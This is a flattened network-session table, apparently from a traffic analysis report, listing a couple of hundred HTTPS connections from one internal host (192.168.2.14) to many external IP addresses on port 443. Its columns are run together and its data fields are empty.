                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11764192.168.2.1438896123.45.162.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11765192.168.2.145966864.216.194.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11766192.168.2.1448758117.57.55.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11767192.168.2.1460316152.71.101.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11768192.168.2.1445166160.199.255.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11769192.168.2.1455668170.44.40.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11770192.168.2.1455506157.239.3.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11771192.168.2.1447536207.235.79.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11772192.168.2.1442086139.52.195.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11773192.168.2.1457668153.229.147.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11774192.168.2.1445322130.207.142.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11775192.168.2.145513081.107.37.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11776192.168.2.14578241.239.3.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11777192.168.2.1437436172.192.67.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11778192.168.2.1446276199.67.101.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11779192.168.2.143568627.219.167.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11780192.168.2.1450982184.124.13.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11781192.168.2.145864098.87.192.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11782192.168.2.145958091.141.251.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11783192.168.2.1457756183.205.61.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11784192.168.2.143748892.98.211.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11785192.168.2.1449936103.167.249.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11786192.168.2.1433342155.158.65.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11787192.168.2.145117644.147.109.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11788192.168.2.144254446.195.140.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11789192.168.2.1434384205.237.162.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11790192.168.2.1456956125.26.176.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11791192.168.2.1447486167.216.189.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11792192.168.2.1456652187.123.10.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11793192.168.2.1453160155.181.8.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11794192.168.2.1433138168.91.61.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11795192.168.2.1433840116.52.110.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11796192.168.2.1459580133.183.78.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11797192.168.2.144560646.32.192.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11798192.168.2.1443594191.118.164.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11799192.168.2.1453368172.92.154.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11800192.168.2.1436320193.184.229.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11801192.168.2.1444280101.255.247.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11802192.168.2.1457142151.57.85.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11803192.168.2.1458890145.9.107.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11804192.168.2.1441422205.16.24.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11805192.168.2.1440442123.197.19.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11806192.168.2.1438640136.28.214.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11807192.168.2.1443298115.171.216.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11808192.168.2.145129262.237.226.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11809192.168.2.1445542165.148.66.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11810192.168.2.1448728157.201.90.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11811192.168.2.143739460.225.231.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11812192.168.2.145616075.71.209.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11813192.168.2.1448094135.155.99.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11814192.168.2.145316461.200.234.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11815192.168.2.1454568183.73.69.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11816192.168.2.145205269.164.130.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11817192.168.2.1436910200.133.46.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11818192.168.2.145424292.3.76.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11819192.168.2.145924261.200.245.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11820192.168.2.1451582146.250.190.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11821192.168.2.1460818123.177.219.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11822192.168.2.1450650174.166.170.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11823192.168.2.143478298.181.89.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11824192.168.2.1450780124.229.107.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11825192.168.2.1433756141.74.105.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11826192.168.2.1433690199.242.249.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11827192.168.2.1444046161.28.199.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11828192.168.2.1437974103.215.13.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11829192.168.2.1453206122.237.199.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11830192.168.2.1460276169.4.95.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11831192.168.2.1444580185.252.40.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11832192.168.2.1444112134.141.52.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11833192.168.2.1450094213.0.88.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11834192.168.2.144570262.118.56.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11835192.168.2.143437842.241.95.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11836192.168.2.143413849.163.15.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11837192.168.2.1454228205.71.123.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11838192.168.2.1458918197.252.168.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11839192.168.2.1459984107.54.207.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11840192.168.2.146002479.240.191.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11841192.168.2.144816276.116.162.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11842192.168.2.1446536139.236.33.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11843192.168.2.145989434.231.100.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11844192.168.2.1449662204.206.151.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11845192.168.2.1433250115.152.102.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11846192.168.2.144200082.108.183.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11847192.168.2.1458554149.10.27.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11848192.168.2.1445834139.213.121.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11849192.168.2.1452388150.11.14.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11850192.168.2.145340613.247.254.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11851192.168.2.1447764181.17.76.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11852192.168.2.1446172170.176.137.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11853192.168.2.1456450206.24.171.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11854192.168.2.1434310123.170.103.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11855192.168.2.1455286200.150.184.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11856192.168.2.1438372107.218.1.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11857192.168.2.144667693.60.211.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11858192.168.2.1447182173.223.152.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11859192.168.2.144913842.166.176.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11860192.168.2.1451880207.47.45.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11861192.168.2.1441672187.158.157.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11862192.168.2.1449690126.108.103.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11863192.168.2.1458358108.245.214.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11864192.168.2.1455886169.98.173.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11865192.168.2.1447728223.130.215.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11866192.168.2.1434886202.79.229.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11867192.168.2.145318677.178.168.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11868192.168.2.1440956156.87.199.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11869192.168.2.1458744188.6.255.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11870192.168.2.145997070.103.130.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11871192.168.2.1434718220.68.127.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11872192.168.2.146023864.75.129.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11873192.168.2.1447890208.221.249.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11874192.168.2.1453124143.89.185.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11875192.168.2.144128063.202.96.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11876192.168.2.146089676.74.95.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11877192.168.2.1442180154.242.191.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11878192.168.2.1449690122.111.103.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11879192.168.2.145372014.186.222.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11880192.168.2.1434570162.230.192.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11881192.168.2.14427921.26.108.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11882192.168.2.145073251.255.171.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11883192.168.2.145084066.214.37.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11884192.168.2.1447734182.232.219.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11885192.168.2.1445046172.245.63.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11886192.168.2.144120631.100.116.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11887192.168.2.143669266.253.30.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11888192.168.2.1460120175.126.237.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11889192.168.2.1437436192.219.43.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11890192.168.2.1459708197.23.169.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11891192.168.2.145362494.84.100.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11892192.168.2.145902637.29.20.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11893192.168.2.1460158148.119.213.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11894192.168.2.143977263.162.203.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11895192.168.2.1450128109.151.115.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11896192.168.2.1460840156.115.76.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11897192.168.2.144722639.137.157.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11898192.168.2.145403658.141.142.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11899192.168.2.1458434201.118.81.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11900192.168.2.1450808133.76.250.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11901192.168.2.14402701.177.68.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11902192.168.2.14411328.81.242.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11903192.168.2.1445900135.166.100.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11904192.168.2.1434006170.114.24.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11905192.168.2.1450730153.170.132.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11906192.168.2.1459442101.145.181.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11907192.168.2.1458952117.171.112.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11908192.168.2.1453186171.179.195.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11909192.168.2.1447858200.82.119.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11910192.168.2.1447288200.133.131.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11911192.168.2.1439754121.202.232.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11912192.168.2.1438024101.170.203.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11913192.168.2.1448880181.102.111.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11914192.168.2.1457358219.47.159.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11915192.168.2.1435324116.146.211.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11916192.168.2.14500581.145.136.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11917192.168.2.144268419.174.76.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11918192.168.2.1442230208.107.152.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11919192.168.2.1450640122.135.136.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11920192.168.2.1460808221.156.171.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11921192.168.2.1437904195.70.102.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11922192.168.2.143368842.120.11.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11923192.168.2.1450518222.247.86.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11924192.168.2.1444196219.236.168.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11925192.168.2.1433568222.200.156.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11926192.168.2.14606344.110.171.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11927192.168.2.1445934203.125.243.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11928192.168.2.1436004100.186.75.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11929192.168.2.145136485.57.138.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11930192.168.2.1436868166.18.92.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11931192.168.2.144431499.158.40.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11932192.168.2.1459848178.237.107.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11933192.168.2.1435838109.64.223.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11934192.168.2.144914886.141.117.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11935192.168.2.1460652147.52.35.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11936192.168.2.1458378129.161.212.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11937192.168.2.1453520108.110.144.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11938192.168.2.1434262204.207.49.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11939192.168.2.145525071.138.3.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11940192.168.2.1434188101.251.65.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11941192.168.2.1440494218.214.172.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11942192.168.2.143470625.194.62.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11943192.168.2.1454482162.4.0.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11944192.168.2.1442534179.93.46.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11945192.168.2.144423649.168.85.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11946192.168.2.1447072115.193.202.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11947192.168.2.145171895.247.152.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11948192.168.2.1434724178.38.186.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11949192.168.2.143843061.111.198.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11950192.168.2.1455966180.168.23.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11951192.168.2.1448198203.210.75.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11952192.168.2.144179285.189.210.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11953192.168.2.1434870182.117.191.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11954192.168.2.1433522147.191.101.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11955192.168.2.144231654.86.201.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11956192.168.2.1447786158.242.159.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11957192.168.2.1454940117.66.84.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11958192.168.2.1451382209.11.198.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11959192.168.2.145959212.19.6.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11960192.168.2.1436068166.147.199.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11961192.168.2.1438876176.199.23.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11962192.168.2.145423268.191.122.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11963192.168.2.145775487.196.77.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11964192.168.2.144057437.231.98.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11965192.168.2.144419246.2.206.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11966192.168.2.145508074.35.160.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11967192.168.2.1460474110.152.87.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11968192.168.2.1440252134.217.167.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11969192.168.2.1438454183.38.27.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11970192.168.2.143459214.109.50.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11971192.168.2.1455690223.90.243.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11972192.168.2.1459666196.173.247.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11973192.168.2.1440852160.136.197.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11974192.168.2.144558447.24.91.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11975192.168.2.1442126135.13.26.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11976192.168.2.145718232.153.165.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11977192.168.2.1433188177.248.35.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11978192.168.2.1442112173.217.112.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11979192.168.2.1456434100.43.222.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11980192.168.2.145571249.98.124.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11981192.168.2.143853265.172.68.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11982192.168.2.145260414.97.249.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11983192.168.2.144144631.182.57.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11984192.168.2.144798298.203.27.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
